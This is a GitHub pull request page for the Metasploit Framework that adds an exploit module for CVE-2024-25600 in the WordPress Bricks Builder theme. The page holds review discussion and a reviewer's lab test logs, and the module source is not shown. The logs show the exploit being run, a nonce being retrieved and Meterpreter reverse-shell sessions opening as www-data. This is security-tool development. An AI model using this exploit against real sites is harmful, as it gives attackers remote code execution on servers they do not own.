Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add wp_bricks_builder_rce (CVE-2024-25600) #18891

Merged
10 commits merged into from
Mar 26, 2024

Conversation

Chocapikk
Copy link
Contributor

This pull request introduces the wp_bricks_builder_rce exploit module that targets a known vulnerability in the Bricks Builder plugin for WordPress. The module has been developed following the best practices outlined in the Metasploit Framework documentation and has been thoroughly tested to ensure reliability and effectiveness.

Comprehensive documentation has been included to facilitate understanding and usage of the module by other security professionals and developers.

I believe this module will be a valuable addition to the Metasploit Framework and look forward to any feedback or suggestions for improvement.

Best regards,
Chocapikk

@Chocapikk Chocapikk changed the title Add wp_bricks_builder_rce Add wp_bricks_builder_rce (CVE-2024-25600) Feb 26, 2024
@Chocapikk
Copy link
Contributor Author

Chocapikk commented Feb 28, 2024

Hello, I wanted to know about the "Sanity Test Execution", since the changes in my code, it no longer validates this test. I would like some help on this, thank you.

EDIT: Just a bug

@Chocapikk Chocapikk force-pushed the wp_bricks_builder_rce branch from b12490c to 45ae984 Compare February 28, 2024 20:21
@Chocapikk Chocapikk force-pushed the wp_bricks_builder_rce branch from 4a861e9 to 45ae984 Compare March 1, 2024 13:34
@Chocapikk Chocapikk requested a review from sjanusz-r7 March 1, 2024 14:24
@sjanusz-r7
Copy link
Contributor

I think the change seems pretty legit, thanks! 👍 I think NoAccess makes sense there, since we have the check method handling other scenarios (e.g. offline, etc.)

@Chocapikk
Copy link
Contributor Author

Hello @jheysel-r7

Any news about the module? Thanks 🙂

@jheysel-r7 jheysel-r7 self-assigned this Mar 20, 2024
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the great module @Chocapikk! I've left a couple minor suggestions. Testing was as expected:

ARCH_PHP

msf6 exploit(multi/http/wp_bricks_builder_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8000
rport => 8000
msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/wp_bricks_builder_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.3
[+] Detected Bricks theme version: 1.8
[+] The target appears to be vulnerable.
[+] Nonce retrieved: c5e035c396
[*] Sending stage (39927 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:56073) at 2024-03-26 12:05:11 -0700
[*] Sending stage (39927 bytes) to 172.16.199.72

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 29292f368fe3
OS          : Linux 29292f368fe3 6.6.16-linuxkit #1 SMP PREEMPT_DYNAMIC Fri Feb 16 11:55:08 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter >exit

ARCH_CMD

msf6 exploit(multi/http/wp_bricks_builder_rce) > set target 2
target => 2
msf6 exploit(multi/http/wp_bricks_builder_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:8000
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.3
[+] Detected Bricks theme version: 1.8
[+] The target appears to be vulnerable.
[+] Nonce retrieved: c5e035c396
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Meterpreter session 3 opened (172.16.199.1:8000 -> 172.16.199.1:56169) at 2024-03-26 12:08:17 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.22.0.3
OS           : Debian 12.5 (Linux 6.6.16-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

modules/exploits/multi/http/wp_bricks_builder_rce.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/wp_bricks_builder_rce.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/wp_bricks_builder_rce.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/wp_bricks_builder_rce.rb Outdated Show resolved Hide resolved
@Chocapikk Chocapikk requested a review from jheysel-r7 March 26, 2024 20:08
@Chocapikk
Copy link
Contributor Author

Chocapikk commented Mar 26, 2024

Hello @jheysel-r7 ,

I don't think I need to make any changes except to add your suggestions and fix the typos, tested on my lab and it's good too. Thanks for the changes and the explanations as well !

@jheysel-r7 jheysel-r7 closed this pull request by merging all changes into rapid7:master in abb2eb7 Mar 26, 2024
@jheysel-r7
Copy link
Contributor

Release Notes

This PR adds an exploit module that targets a known vulnerability, CVE-2024-25600, in the WordPress Bricks Builder Theme, versions prior to 1.9.6.

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 27, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

3 participants